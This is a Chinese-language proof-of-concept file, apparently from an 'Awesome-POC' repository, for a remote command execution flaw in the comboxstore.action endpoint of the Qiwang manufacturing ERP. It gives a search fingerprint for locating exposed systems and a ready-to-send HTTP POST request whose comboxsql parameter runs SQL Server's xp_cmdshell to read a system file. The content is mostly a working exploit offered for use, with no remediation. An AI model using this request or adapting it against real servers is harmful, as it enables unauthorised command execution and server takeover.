Awesome-POC/Web应用漏洞/企望制造 ERP comboxstore.action 远程命令执行漏洞.md
2024-11-06 14:10:36 +08:00

33 lines
689 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 企望制造 ERP comboxstore.action 远程命令执行漏洞
## 漏洞描述
企望制造 ERP comboxstore.action接口存在远程命令执行漏洞攻击者通过漏洞可以获取服务器权限执行任意命令
## 漏洞影响
企望制造 ERP
## 网络测绘
```
title="企望制造ERP系统"
```
## 漏洞复现
登陆页面
![image-20230828150159555](images/image-20230828150159555.png)
验证POC
```
POST /mainFunctions/comboxstore.action HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host:
comboxsql=exec%20xp_cmdshell%20'type%20C:\Windows\Win.ini'
```
![image-20230828150215433](images/image-20230828150215433.png)